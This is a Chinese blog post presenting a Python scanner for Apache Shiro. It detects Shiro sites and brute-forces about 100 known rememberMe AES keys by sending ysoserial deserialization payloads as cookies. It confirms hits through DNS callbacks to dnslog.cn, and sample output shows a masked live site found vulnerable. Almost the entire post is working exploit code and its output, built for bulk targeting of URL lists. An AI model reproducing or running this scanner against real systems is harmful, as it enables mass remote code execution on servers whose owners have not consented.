Shiro 存活以及100key批量扫描

主页 2020-07-22

0x00 : 简介

Shiro 存活以及100key批量扫描


0x01 : 脚本

Github地址 : https://github.com/saltyfishyu/Shiro_Alive_keys_can

# -*- encoding: utf-8 -*-
#  author : yuf1sher

import os
import re
import base64
import uuid,time
import subprocess
import requests,sys
from Crypto.Cipher import AES
import random,argparse,Queue,threading
import warnings
import requests


warnings.filterwarnings("ignore")
JAR_FILE = './ysoserial.jar'
scan_count = 0
vuln_count = 0
success = []
session = requests.Session()

def poc(url, rce_command,key_):
    if '://' not in url:
        target = 'https://%s' % url if ':443' in url else 'http://%s' % url
    else:
        target = url
    try:
        payload = generator(rce_command, JAR_FILE,key_) # 生成payload
        r = requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10,verify=False)  # 发送验证请求
    except Exception, e:
        return True
    return True


def generator(command, fp,key_):
    if not os.path.exists(fp):
        raise Exception('jar file not found!')
    popen = subprocess.Popen(['java', '-jar', fp, 'JRMPClient', command],
                             stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    mode = AES.MODE_CBC
    iv = uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key_), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

#取得随机数
def random_str(len):
    str1 = ""
    for i in range(len):
        str1 += (random.choice("QWERTYUIOPASDFGHJKLZXCVBNM1234567890"))
    return str(str1)

def getdomain():
    try :
        ret = session.get("http://www.dnslog.cn/getdomain.php?t="+str(random.randint(100000,999999)),timeout=10).text
    except Exception as e:
        print("getdomain error:" + str(e))
        ret = "error"
        pass
    return ret

def getrecord():
    try :
        ret = session.get("http://www.dnslog.cn/getrecords.php?t="+str(random.randint(100000,999999)),timeout=10).text
        #print(ret)
    except Exception as e:
        print("getrecord error:" + str(e))
        ret = "error"
        pass
    return ret

def getdnshost():
    reversehost = ""
    try :
        domain = getdomain()
        if domain=="error":
            print("getdomain error")
        else:
            #reversehost = "http://" +domain
            reversehost = domain
            #print("got reversehost : " + reversehost)
    except:
        pass
    return reversehost

def detect(url_list):
    shiro_url_list = []
    for url in url_list:
        if '://' not in url:
            target = 'https://%s' % url if ':443' in url else 'http://%s' % url
        else:
            target = url
        try:
            r = requests.post(target, cookies={'rememberMe': '1'}, timeout=10,verify=False)
        except Exception, e:
            pass
        headers = r.headers.get('Set-Cookie')
        if not headers is None:
            if 'rememberMe=deleteMe' in headers:
                shiro_url_list.append(target)
                print "[+] Detect Shiro url: %s." % (target)
        else:
            print "[-] Detect Valid Shiro url: %s." % (target)
    return shiro_url_list

def check_vuln():
    key = {
    "kPH+bIxk5D2deZiIxcaaaA==",
    "4AvVhmFLUs0KTA3Kprsdag==",
    "Z3VucwAAAAAAAAAAAAAAAA==",
    "fCq+/xW488hMTCD+cmJ3aQ==",
    "0AvVhmFLUs0KTA3Kprsdag==",
    "1AvVhdsgUs0FSA3SDFAdag==",
    "1QWLxg+NYmxraMoxAXu/Iw==",
    "25BsmdYwjnfcWmnhAciDDg==",
    "2AvVhdsgUs0FSA3SDFAdag==",
    "3AvVhmFLUs0KTA3Kprsdag==",
    "3JvYhmBLUs0ETA5Kprsdag==",
    "r0e3c16IdVkouZgk1TKVMg==",
    "5aaC5qKm5oqA5pyvAAAAAA==",
    "5AvVhmFLUs0KTA3Kprsdag==",
    "6AvVhmFLUs0KTA3Kprsdag==",
    "6NfXkC7YVCV5DASIrEm1Rg==",
    "6ZmI6I2j5Y+R5aSn5ZOlAA==",
    "cmVtZW1iZXJNZQAAAAAAAA==",
    "7AvVhmFLUs0KTA3Kprsdag==",
    "8AvVhmFLUs0KTA3Kprsdag==",
    "8BvVhmFLUs0KTA3Kprsdag==",
    "9AvVhmFLUs0KTA3Kprsdag==",
    "OUHYQzxQ/W9e/UjiAGu6rg==",
    "a3dvbmcAAAAAAAAAAAAAAA==",
    "aU1pcmFjbGVpTWlyYWNsZQ==",
    "bWljcm9zAAAAAAAAAAAAAA==",
    "bWluZS1hc3NldC1rZXk6QQ==",
    "bXRvbnMAAAAAAAAAAAAAAA==",
    "ZUdsaGJuSmxibVI2ZHc9PQ==",
    "wGiHplamyXlVB11UXWol8g==",
    "U3ByaW5nQmxhZGUAAAAAAA==",
    "MTIzNDU2Nzg5MGFiY2RlZg==",
    "L7RioUULEFhRyxM7a2R/Yg==",
    "a2VlcE9uR29pbmdBbmRGaQ==",
    "WcfHGU25gNnTxTlmJMeSpw==",
    "OY//C4rhfwNxCQAQCrQQ1Q==",
    "5J7bIJIV0LQSN3c9LPitBQ==",
    "f/SY5TIve5WWzT4aQlABJA==",
    "bya2HkYo57u6fWh5theAWw==",
    "WuB+y2gcHRnY2Lg9+Aqmqg==",
    "kPv59vyqzj00x11LXJZTjJ2UHW48jzHN",
    "3qDVdLawoIr1xFd6ietnwg==",
    "ZWvohmPdUsAWT3=KpPqda",
    "YI1+nBV//m7ELrIyDHm6DQ==",
    "6Zm+6I2j5Y+R5aS+5ZOlAA==",
    "2A2V+RFLUs+eTA3Kpr+dag==",
    "6ZmI6I2j3Y+R1aSn5BOlAA==",
    "SkZpbmFsQmxhZGUAAAAAAA==",
    "2cVtiE83c4lIrELJwKGJUw==",
    "fsHspZw/92PrS3XrPW+vxw==",
    "XTx6CKLo/SdSgub+OPHSrw==",
    "sHdIjUN6tzhl8xZMG3ULCQ==",
    "O4pdf+7e+mZe8NyxMTPJmQ==",
    "HWrBltGvEZc14h9VpMvZWw==",
    "rPNqM6uKFCyaL10AK51UkQ==",
    "Y1JxNSPXVwMkyvES/kJGeQ==",
    "lT2UvDUmQwewm6mMoiw4Ig==",
    "MPdCMZ9urzEA50JDlDYYDg==",
    "xVmmoltfpb8tTceuT5R7Bw==",
    "c+3hFGPjbgzGdrC+MHgoRQ==",
    "ClLk69oNcA3m+s0jIMIkpg==",
    "Bf7MfkNR0axGGptozrebag==",
    "1tC/xrDYs8ey+sa3emtiYw==",
    "ZmFsYWRvLnh5ei5zaGlybw==",
    "cGhyYWNrY3RmREUhfiMkZA==",
    "IduElDUpDDXE677ZkhhKnQ==",
    "yeAAo1E8BOeAYfBlm4NG9Q==",
    "cGljYXMAAAAAAAAAAAAAAA==",
    "2itfW92XazYRi5ltW0M2yA==",
    "XgGkgqGqYrix9lI6vxcrRw==",
    "ertVhmFLUs0KTA3Kprsdag==",
    "5AvVhmFLUS0ATA4Kprsdag==",
    "s0KTA3mFLUprK4AvVhsdag==",
    "hBlzKg78ajaZuTE0VLzDDg==",
    "9FvVhtFLUs0KnA3Kprsdyg==",
    "d2ViUmVtZW1iZXJNZUtleQ==",
    "yNeUgSzL/CfiWw1GALg6Ag==",
    "NGk/3cQ6F5/UNPRh8LpMIg==",
    "4BvVhmFLUs0KTA3Kprsdag==",
    "MzVeSkYyWTI2OFVLZjRzZg==",
    "CrownKey==a12d/dakdad",
    "empodDEyMwAAAAAAAAAAAA==",
    "A7UzJgh1+EWj5oBFi+mSgw==",
    "YTM0NZomIzI2OTsmIzM0NTueYQ==",
    "c2hpcm9fYmF0aXMzMgAAAA==",
    "i45FVt72K2kLgvFrJtoZRw==",
    "U3BAbW5nQmxhZGUAAAAAAA==",
    "ZnJlc2h6Y24xMjM0NTY3OA==",
    "Jt3C93kMR9D5e8QzwfsiMw==",
    "MTIzNDU2NzgxMjM0NTY3OA==",
    "vXP33AonIp9bFwGl7aT7rA==",
    "V2hhdCBUaGUgSGVsbAAAAA==",
    "Z3h6eWd4enklMjElMjElMjE=",
    "Q01TX0JGTFlLRVlfMjAxOQ==",
    "ZAvph3dsQs0FSL3SDFAdag==",
    "Is9zJ3pzNh2cgTHB4ua3+Q==",
    "NsZXjXVklWPZwOfkvk6kUA==",
    "GAevYnznvgNCURavBhCr1w==",
    "66v1O8keKNV3TTcGPK1wzg==",
    "SDKOLKn2J1j/2BHjeZwAoQ=="
    }
    global scan_count,vuln_count

    while True:
        try :
            web_url = queue.get(timeout=0.1)
            scan_count+=1
        except:
            break
        try:
            for key_ in key:
                random_str_ = random_str(8)
                connect = poc(web_url,random_str_ + "." + domain,key_)
                print "[*] Trying url:%s , key:%s. " % (web_url,key_)
                if connect == False:
                    break
                result = getrecord()
                if (random_str_ + '.' + domain) in result:
                    print "[+200] vuln apache shiro",web_url,key_
                    success.append((web_url,key_))
                    vuln_count+=1
                    break
                else:
                    pass
        except Exception,e:
            pass

if __name__ == '__main__':
    parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,
                                    description='Apache Shiro Scanner.',
                                    usage='scan.py [optional]')
    parser.add_argument('-f',metavar='File',type=str,default='url.txt',help='Put Web url in url.txt')
    parser.add_argument('-u',metavar='Url',type=str,help='Put a Web url')
    parser.add_argument('-t',metavar='THREADS',type=int,default='10',help='Num of scan threads,default 10')

    #global domain, reversehost
    global domain
    domain = getdnshost()
    #if domain:
    #    reversehost = "http://" + domain
    #    print "[*] domain: %s. reversehost: %s." % (domain, reversehost)
    print "[*] domain: %s." % (domain)
    if len(sys.argv)==1:
        sys.argv.append('-h')
    args = parser.parse_args()
    start_time = time.time()
    detect_web_url = []
    shiro_web_url = []
    if args.u is None:
        for web_url in open(args.f).xreadlines():
            web_url = web_url.strip()
            if not web_url:
                continue
            detect_web_url.append(web_url)
        shiro_web_url = detect(detect_web_url)
        print "[*] Detect Shiro_web_url: %s." % (shiro_web_url)
        if shiro_web_url != []:
            #将存在shiro的url放入队列
            queue = Queue.Queue()
            for web_url in shiro_web_url:
                queue.put(web_url)
            #for web_url in open(args.f).xreadlines():
            #    web_url = web_url.strip() 
            #    if not web_url:
            #        continue
            #    queue.put(web_url)

            #开启多线程访问
            threads = []
            for i in range(args.t):
                t = threading.Thread(target=check_vuln)
                threads.append(t)
                t.start()

            for t in threads:
                t.join()
        
    else:
        queue = Queue.Queue()
        queue.put(args.u)
        check_vuln()
    print ('[+] Done. %s weburl scanned %s available %.1f seconds.' % (scan_count,vuln_count,time.time() - start_time))
    print "\n"
    for success_list in success:
        print "[+] Vuln urls:%s, key:%s." % (success_list[0],success_list[1])

0x02 : 测试

Shiro_Alive_keys_can> python .\Shiro_Alive_keys_can.py -f urls.txt
--------------------------- Get Dnslog Domain ----------------------------
[*] domain: 33vwdt.dnslog.cn.
--------------------------- Detect Alive Shiro Url ----------------------------
[+] Detect Valid Shiro url: https://***/user/login.
[-] Detect Invalid url: http://www.baidu.com.
--------------------------- Get Shiro Url ----------------------------
[*] Detect Shiro_web_url: ['https://***/user/login'].
--------------------------- Keys Scan ----------------------------
[*] Trying url:https://***/user/login , key:5AvVhmFLUs0KTA3Kprsdag==.
[*] Trying url:https://***/user/login , key:SkZpbmFsQmxhZGUAAAAAAA==.
[*] Trying url:https://***/user/login , key:V2hhdCBUaGUgSGVsbAAAAA==.
[*] Trying url:https://***/user/login , key:aU1pcmFjbGVpTWlyYWNsZQ==.
[*] Trying url:https://***/user/login , key:d2ViUmVtZW1iZXJNZUtleQ==.
[*] Trying url:https://***/user/login , key:fCq+/xW488hMTCD+cmJ3aQ==.
[*] Trying url:https://***/user/login , key:NsZXjXVklWPZwOfkvk6kUA==.
[*] Trying url:https://***/user/login , key:4AvVhmFLUs0KTA3Kprsdag==.
[*] Trying url:https://***/user/login , key:ZUdsaGJuSmxibVI2ZHc9PQ==.
[*] Trying url:https://***/user/login , key:1AvVhdsgUs0FSA3SDFAdag==.
[*] Trying url:https://***/user/login , key:hBlzKg78ajaZuTE0VLzDDg==.
[*] Trying url:https://***/user/login , key:OUHYQzxQ/W9e/UjiAGu6rg==.
[*] Trying url:https://***/user/login , key:2AvVhdsgUs0FSA3SDFAdag==.
[*] Trying url:https://***/user/login , key:Y1JxNSPXVwMkyvES/kJGeQ==.
[*] Trying url:https://***/user/login , key:2A2V+RFLUs+eTA3Kpr+dag==.
[*] Trying url:https://***/user/login , key:XgGkgqGqYrix9lI6vxcrRw==.
[*] Trying url:https://***/user/login , key:SDKOLKn2J1j/2BHjeZwAoQ==.
[*] Trying url:https://***/user/login , key:bWljcm9zAAAAAAAAAAAAAA==.
[*] Trying url:https://***/user/login , key:9FvVhtFLUs0KnA3Kprsdyg==.
[*] Trying url:https://***/user/login , key:cGljYXMAAAAAAAAAAAAAAA==.
[*] Trying url:https://***/user/login , key:WuB+y2gcHRnY2Lg9+Aqmqg==.
[*] Trying url:https://***/user/login , key:bXRvbnMAAAAAAAAAAAAAAA==.
[*] Trying url:https://***/user/login , key:6NfXkC7YVCV5DASIrEm1Rg==.
[*] Trying url:https://***/user/login , key:kPv59vyqzj00x11LXJZTjJ2UHW48jzHN.
[*] Trying url:https://***/user/login , key:Z3h6eWd4enklMjElMjElMjE=.
[*] Trying url:https://***/user/login , key:i45FVt72K2kLgvFrJtoZRw==.
[*] Trying url:https://***/user/login , key:Bf7MfkNR0axGGptozrebag==.
[*] Trying url:https://***/user/login , key:66v1O8keKNV3TTcGPK1wzg==.
[*] Trying url:https://***/user/login , key:8BvVhmFLUs0KTA3Kprsdag==.
[*] Trying url:https://***/user/login , key:kPH+bIxk5D2deZiIxcaaaA==.
--------------------------- Result ----------------------------
[+] Done. 1 weburl scanned 1 available 5.1 seconds.
--------------------------- Vuln Shiro Url , keys ----------------------------
[*] Vuln urls:https://***/user/login, key:kPH+bIxk5D2deZiIxcaaaA==.

0x03 : 参考

https://github.com/Stu2014/scan/blob/master/shiro_scan.py
https://github.com/insightglacier/Shiro_exploit



本文由 saltyfishyu 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

还不快抢沙发

添加新评论